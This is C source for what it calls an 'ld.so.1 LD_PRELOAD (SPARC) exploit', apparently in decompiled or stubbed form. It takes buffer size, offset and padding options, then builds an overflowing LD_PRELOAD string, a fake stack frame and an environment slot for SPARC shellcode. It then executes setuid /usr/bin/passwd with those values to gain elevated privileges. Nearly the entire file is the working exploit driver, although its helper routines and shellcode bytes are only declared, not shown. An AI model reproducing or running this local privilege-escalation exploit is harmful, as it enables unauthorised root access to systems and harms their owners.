
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int DEF_FPAD_LEN ;
 int DEF_OFFSET ;
 long FRAME_ADDR ;
 int REC_BUF_SIZE ;
 char* SPARC_sc ;
 int atoi (int ) ;
 long atol (int ) ;
 int execve (char*,char**,char**) ;
 int exit (int ) ;
 char* get_envs_str (char) ;
 char* get_fake_frame (long) ;
 char* get_ld_env (int,long) ;
 char getopt (int,char**,char*) ;
 scalar_t__ malloc (int) ;
 int memset (char*,float,int) ;
 int optarg ;
 scalar_t__ optind ;
 int perror (char*) ;
 int printf (char*,...) ;

int main(int argc, char **argv)
{

  char *prog[3];
  char *envs[7];
  char opt;
  int buf_size = -1;
  int fpad_len = -1;
  long offset = -1;

  char *ld_pre_env = 0x0;
  char *fake_frame = 0x0;



  char *envs_str1 = 0x0;
  char *envs_str2 = 0x0;
  char *fpad_buf = 0x0;




  while((opt = getopt(argc, argv, "s:o:p:")) != -1)
  {
    switch(opt) {
    case 's':
      if(!optarg) {
 printf("-s needs size argument\n");
 exit(0);
      }
      else
 buf_size = atoi(optarg);
      break;

    case 'o':
      if(!optarg) {
 printf("-o needs offset argument\n");
 exit(0);
      }
      else
 offset = atol(optarg);
      break;

    case 'p':
      if(!optarg) {
 printf("-p needs pad length argument\n");
 exit(0);
      }
      else {
 fpad_len = atoi(optarg);
 if(fpad_len < 0)
   fpad_len = 0;
      }
      break;

    default:
      printf("Usage: %s [-s size] [-o offset] [-p fpad_len]\n", argv[0]);
      exit(0);

    }

    argc -= optind;
    argv += optind;
  }

  printf("\n#######################################\n");
  printf("# ld.so.1 LD_PRELOAD (SPARC) exploit  #\n");
  printf("# coded by: osker178 (bjr213@psu.edu) #\n");
    printf("#######################################\n\n");

  if(buf_size == -1)
  {
    printf("Using default/recommended buffer size of %d\n", REC_BUF_SIZE);
    buf_size = REC_BUF_SIZE;
  }
  else if(buf_size % 4)
  {
    buf_size = buf_size + (4 - (buf_size%4));
    printf("WARNING: Rounding BUF_SIZE up to 0x%x (%d)\n", buf_size, buf_size);
  }


  if(offset == -1)
  {
    printf("Using default OFFSET of 0x%x (%d)\n", DEF_OFFSET, DEF_OFFSET);
    offset = DEF_OFFSET;
  }
  else if((FRAME_ADDR + offset) % 8)
  {
    offset = offset + (8 - (offset%8));
    printf("WARNING: Rounding offset up to 0x%x (%d)\n", offset, offset);
    printf("(otherwise FRAME_ADDR would not be alligned correctly)\n");
  }


  if(fpad_len == -1)
  {
    printf("Using default FPAD_LEN of 0x%x (%d)\n", DEF_FPAD_LEN, DEF_FPAD_LEN);
    fpad_len = DEF_FPAD_LEN;
  }




  ld_pre_env = get_ld_env(buf_size, offset);
  if(!ld_pre_env)
    exit(0);

  fake_frame = get_fake_frame(offset);
  if(!fake_frame)
    exit(0);

  envs_str1 = get_envs_str('1');
  if(!envs_str1)
    exit(0);

  envs_str2 = get_envs_str('2');
  if(!envs_str2)
    exit(0);






  fpad_buf = (char *)malloc(fpad_len+1);
  if(!fpad_buf)
  {
    perror("malloc");
    exit(0);
  }
  memset(fpad_buf, 'F', fpad_len);
  fpad_buf[fpad_len] = '\0';


  envs[0] = fpad_buf;
  envs[1] = fake_frame;
  envs[2] = envs_str1;
  envs[3] = SPARC_sc;
  envs[4] = envs_str2;
  envs[5] = ld_pre_env;
  envs[6] = ((void*)0);

  prog[0] = "/usr/bin/passwd";
  prog[1] = "passwd";
  prog[2] = ((void*)0);

  execve(prog[0], prog, envs);

  perror("execve");

  return 0;
}
